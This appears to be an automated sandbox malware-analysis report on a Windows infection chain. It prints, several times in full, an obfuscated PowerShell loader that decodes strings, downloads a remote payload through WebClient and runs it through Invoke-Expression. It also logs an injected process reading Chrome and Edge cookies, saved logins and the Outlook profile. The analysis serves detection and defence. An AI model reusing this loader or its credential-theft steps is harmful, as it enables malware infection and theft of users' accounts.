uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. 
Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModcJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. 
Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. 
Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
          Source: C:\Windows\SysWOW64\ktmutil.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#debrief klargoeringstekniker overmortgaged kernefrugterne chewers underrealises #>;$nethes='regreskravenes';<#hertugdoemmer accessionernes vitaminisering senvy #>;$hawse=$host.privatedata;if ($hawse) {$justerkammer++;}function bisulc($supernumerary){$frstestyrmand=$supernumerary.length-$justerkammer;for( $entremess=3;$entremess -lt $frstestyrmand;$entremess+=4){$bar+=$supernumerary[$entremess];}$bar;}function brdnidens($naturaliseredes){ .($spectrographic) ($naturaliseredes);}$brnehospitalerne=bisulc 'locmdraobrnz tji m,l fal la t /ga,5tan. f0bog vea(pilwdi iselnv ndd mo,alwslassta stnsant to gro1ov 0,et.fac0ov ;.to nonwcuri atnund6n,c4 ch; ci arbxud,6for4kn,;she harnonv fa:non1n,n2fla1mar.naz0h m),ul mag cae axc nok h.oops/ ac2 lo0teg1 uk0n n0slh1vir0 bo1hum stuf koiu tr kepelf .uo caxew./ e1bar2bol1lan.pol0s,n ';$paplike=bisulc 'endu epsh,ues.brshr-depana g k ealgnn at al ';$overconfidences=bisulc 'equhbultelstkiupsyssfra: .o/j.h/ sodk.nrbrni mav oeisl.selgdemo a.ori,gkillsabeunc. caclsbo mumthe/hu.u omce g?arbeheixbilpdecohemrundtbla= chdsniofulwindn upltagocema,oiddid&baiib uddom= .e1cyc-harmin 5ferlfu z unl,ollsp,vth hlaag brmsam9end2 re1korztigw selze unav8 ari arq.if3te w.atk proho u dicmi 8innuwhi8conqcornsal ';$corbovinum=bisulc ' sp>tai ';$spectrographic=bisulc 'suci noe vexpel ';$accretive='aphanozygous';$tilvrelsens = bisulc '.useb nc fohe nosc gli%rimaufop p.p.irdpelay.ut rea il% ul\ ,oiha.lbaadh rp a r onvhisepal. ppfthuoforkun. tr&tvr& p cue rucindh.ncota. fartink ';brdnidens (bisulc 'uin$vocg lvlmedooscb raax ls,i:alir rivudle empaffefl,lcirsskoe ponmare re=gru( rc p.msupd u. 
ind/undcund he $bilt briprolbenvkalrdryel,nltetsupae klnmetsisd)din ');brdnidens (bisulc 'int$geogdoklde oskrbpr as ml dr:,nhl inghetetr ddesoskimconms de c npatsb.r= co$fryoaervdreevanrconckelononnanaftr,itvidcatetownguacruseungsi.d.stas.urp bol peic stphy(war$st.cconotelrsambbr oskuvtakicurn hounonmper)sce ');brdnidens (bisulc 'ple[parn.ide,iltdek. ens sue anr tevcriidolc baeforpfiro uaisemn trt .mm mia onnforasubg flehalr in]ir : u :blisresephoc stucirrbesigrntwhuyincp.inr ego pataf.otrvcun,oenelent .at= tu g [pelncr,eslatarm. posba eg ocma uarbrdo iscutbefysprpvelr c ostytdisos rcslaostil aat atyemipaxse wa] re:dry:i.mtal.lsessne 1pas2 .l ');$overconfidences=$lgedommens[0];$continuums= (bisulc ' wi$cepg dul arobagbnona all,em: camc lakn c h,rblioelirbruhse iuafnhjsueugs o2wi,1fo,8o s=moun ave hywm d- dfo kabprej.hoebancmextim enrsdu ygevssipt u e ,umoce.folnmace p t un.bajwkylee sbc lcd.dlomdiurbe exnda t');$continuums+=$rvepelsene[1];brdnidens ($continuums);brdnidens (bisulc 'cal$o aman a pcplar beo ntrdivhcroipernsocud ssb,r2 e1 pl8 os.sikhve,e trapupdko ebearctesrat[ ec$inspra,ahygploblhaeilolk gueo e]tru=uaf$ut b s.rskrnsele h hko overs grpforimant fravillo.semi rh.inplaemis ');$kardinalen=bisulc 'c,r$grumclaamodcJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ^"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe^" "<#debrief klargoeringstekniker overmortgaged kernefrugterne chewers underrealises #>;$nethes='regreskravenes';<#hertugdoemmer accessionernes vitaminisering senvy #>;$hawse=$host.privatedata;if ($hawse) {$justerkammer++;}function bisulc($supernumerary){$frstestyrmand=$supernumerary.length-$justerkammer;for( $entremess=3;$entremess -lt $frstestyrmand;$entremess+=4){$bar+=$supernumerary[$entremess];}$bar;}function brdnidens($naturaliseredes){ .($spectrographic) ($naturaliseredes);}$brnehospitalerne=bisulc 'locmdraobrnz tji m,l fal la t /ga,5tan. f0bog vea(pilwdi iselnv ndd mo,alwslassta stnsant to gro1ov 0,et.fac0ov ;.to nonwcuri atnund6n,c4 ch; ci arbxud,6for4kn,;she harnonv fa:non1n,n2fla1mar.naz0h m),ul mag cae axc nok h.oops/ ac2 lo0teg1 uk0n n0slh1vir0 bo1hum stuf koiu tr kepelf .uo caxew./ e1bar2bol1lan.pol0s,n ';$paplike=bisulc 'endu epsh,ues.brshr-depana g k ealgnn at al ';$overconfidences=bisulc 'equhbultelstkiupsyssfra: .o/j.h/ sodk.nrbrni mav oeisl.selgdemo a.ori,gkillsabeunc. caclsbo mumthe/hu.u omce g?arbeheixbilpdecohemrundtbla= chdsniofulwindn upltagocema,oiddid&baiib uddom= .e1cyc-harmin 5ferlfu z unl,ollsp,vth hlaag brmsam9end2 re1korztigw selze unav8 ari arq.if3te w.atk proho u dicmi 8innuwhi8conqcornsal ';$corbovinum=bisulc ' sp>tai ';$spectrographic=bisulc 'suci noe vexpel ';$accretive='aphanozygous';$tilvrelsens = bisulc '.useb nc fohe nosc gli%rimaufop p.p.irdpelay.ut rea il% ul\ ,oiha.lbaadh rp a r onvhisepal. ppfthuoforkun. tr&tvr& p cue rucindh.ncota. fartink ';brdnidens (bisulc 'uin$vocg lvlmedooscb raax ls,i:alir rivudle empaffefl,lcirsskoe ponmare re=gru( rc p.msupd u. 
ind/undcund he $bilt briprolbenvkalrdryel,nltetsupae klnmetsisd)din ');brdnidens (bisulc 'int$geogdoklde oskrbpr as ml dr:,nhl inghetetr ddesoskimconms de c npatsb.r= co$fryoaervdreevanrconckelononnanaftr,itvidcatetownguacruseungsi.d.stas.urp bol peic stphy(war$st.cconotelrsambbr oskuvtakicurn hounonmper)sce ');brdnidens (bisulc 'ple[parn.ide,iltdek. ens sue anr tevcriidolc baeforpfiro uaisemn trt .mm mia onnforasubg flehalr in]ir : u :blisresephoc stucirrbesigrntwhuyincp.inr ego pataf.otrvcun,oenelent .at= tu g [pelncr,eslatarm. posba eg ocma uarbrdo iscutbefysprpvelr c ostytdisos rcslaostil aat atyemipaxse wa] re:dry:i.mtal.lsessne 1pas2 .l ');$overconfidences=$lgedommens[0];$continuums= (bisulc ' wi$cepg dul arobagbnona all,em: camc lakn c h,rblioelirbruhse iuafnhjsueugs o2wi,1fo,8o s=moun ave hywm d- dfo kabprej.hoebancmextim enrsdu ygevssipt u e ,umoce.folnmace p t un.bajwkylee sbc lcd.dlomdiurbe exnda t');$continuums+=$rvepelsene[1];brdnidens ($continuums);brdnidens (bisulc 'cal$o aman a pcplar beo ntrdivhcroipernsocud ssb,r2 e1 pl8 os.sikhve,e trapupdko ebearctesrat[ ec$inspra,ahygploblhaeilolk gueo e]tru=uaf$ut b s.rskrnsele h hko overs grpforimant fravillo.semi rh.inplaemis ');$kardinalen=bisulc 'c,r$grumclaJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#debrief klargoeringstekniker overmortgaged kernefrugterne chewers underrealises #>;$nethes='regreskravenes';<#hertugdoemmer accessionernes vitaminisering senvy #>;$hawse=$host.privatedata;if ($hawse) {$justerkammer++;}function bisulc($supernumerary){$frstestyrmand=$supernumerary.length-$justerkammer;for( $entremess=3;$entremess -lt $frstestyrmand;$entremess+=4){$bar+=$supernumerary[$entremess];}$bar;}function brdnidens($naturaliseredes){ .($spectrographic) ($naturaliseredes);}$brnehospitalerne=bisulc 'locmdraobrnz tji m,l fal la t /ga,5tan. f0bog vea(pilwdi iselnv ndd mo,alwslassta stnsant to gro1ov 0,et.fac0ov ;.to nonwcuri atnund6n,c4 ch; ci arbxud,6for4kn,;she harnonv fa:non1n,n2fla1mar.naz0h m),ul mag cae axc nok h.oops/ ac2 lo0teg1 uk0n n0slh1vir0 bo1hum stuf koiu tr kepelf .uo caxew./ e1bar2bol1lan.pol0s,n ';$paplike=bisulc 'endu epsh,ues.brshr-depana g k ealgnn at al ';$overconfidences=bisulc 'equhbultelstkiupsyssfra: .o/j.h/ sodk.nrbrni mav oeisl.selgdemo a.ori,gkillsabeunc. caclsbo mumthe/hu.u omce g?arbeheixbilpdecohemrundtbla= chdsniofulwindn upltagocema,oiddid&baiib uddom= .e1cyc-harmin 5ferlfu z unl,ollsp,vth hlaag brmsam9end2 re1korztigw selze unav8 ari arq.if3te w.atk proho u dicmi 8innuwhi8conqcornsal ';$corbovinum=bisulc ' sp>tai ';$spectrographic=bisulc 'suci noe vexpel ';$accretive='aphanozygous';$tilvrelsens = bisulc '.useb nc fohe nosc gli%rimaufop p.p.irdpelay.ut rea il% ul\ ,oiha.lbaadh rp a r onvhisepal. ppfthuoforkun. tr&tvr& p cue rucindh.ncota. fartink ';brdnidens (bisulc 'uin$vocg lvlmedooscb raax ls,i:alir rivudle empaffefl,lcirsskoe ponmare re=gru( rc p.msupd u. 
ind/undcund he $bilt briprolbenvkalrdryel,nltetsupae klnmetsisd)din ');brdnidens (bisulc 'int$geogdoklde oskrbpr as ml dr:,nhl inghetetr ddesoskimconms de c npatsb.r= co$fryoaervdreevanrconckelononnanaftr,itvidcatetownguacruseungsi.d.stas.urp bol peic stphy(war$st.cconotelrsambbr oskuvtakicurn hounonmper)sce ');brdnidens (bisulc 'ple[parn.ide,iltdek. ens sue anr tevcriidolc baeforpfiro uaisemn trt .mm mia onnforasubg flehalr in]ir : u :blisresephoc stucirrbesigrntwhuyincp.inr ego pataf.otrvcun,oenelent .at= tu g [pelncr,eslatarm. posba eg ocma uarbrdo iscutbefysprpvelr c ostytdisos rcslaostil aat atyemipaxse wa] re:dry:i.mtal.lsessne 1pas2 .l ');$overconfidences=$lgedommens[0];$continuums= (bisulc ' wi$cepg dul arobagbnona all,em: camc lakn c h,rblioelirbruhse iuafnhjsueugs o2wi,1fo,8o s=moun ave hywm d- dfo kabprej.hoebancmextim enrsdu ygevssipt u e ,umoce.folnmace p t un.bajwkylee sbc lcd.dlomdiurbe exnda t');$continuums+=$rvepelsene[1];brdnidens ($continuums);brdnidens (bisulc 'cal$o aman a pcplar beo ntrdivhcroipernsocud ssb,r2 e1 pl8 os.sikhve,e trapupdko ebearctesrat[ ec$inspra,ahygploblhaeilolk gueo e]tru=uaf$ut b s.rskrnsele h hko overs grpforimant fravillo.semi rh.inplaemis ');$kardinalen=bisulc 'c,r$grumclaamodJump to behavior
          Source: osqpHpjBCXXA.exe, 0000000B.00000002.2981129582.0000000001810000.00000002.00000001.00040000.00000000.sdmp, osqpHpjBCXXA.exe, 0000000B.00000000.2351716921.0000000001810000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: osqpHpjBCXXA.exe, 0000000B.00000002.2981129582.0000000001810000.00000002.00000001.00040000.00000000.sdmp, osqpHpjBCXXA.exe, 0000000B.00000000.2351716921.0000000001810000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: osqpHpjBCXXA.exe, 0000000B.00000002.2981129582.0000000001810000.00000002.00000001.00040000.00000000.sdmp, osqpHpjBCXXA.exe, 0000000B.00000000.2351716921.0000000001810000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: osqpHpjBCXXA.exe, 0000000B.00000002.2981129582.0000000001810000.00000002.00000001.00040000.00000000.sdmp, osqpHpjBCXXA.exe, 0000000B.00000000.2351716921.0000000001810000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match File source: 0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000C.00000002.2981799081.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000A.00000002.2447450866.0000000022690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000A.00000002.2446978661.00000000216E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\ktmutil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\ktmutil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality

          Source: Yara match File source: 0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000C.00000002.2981799081.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
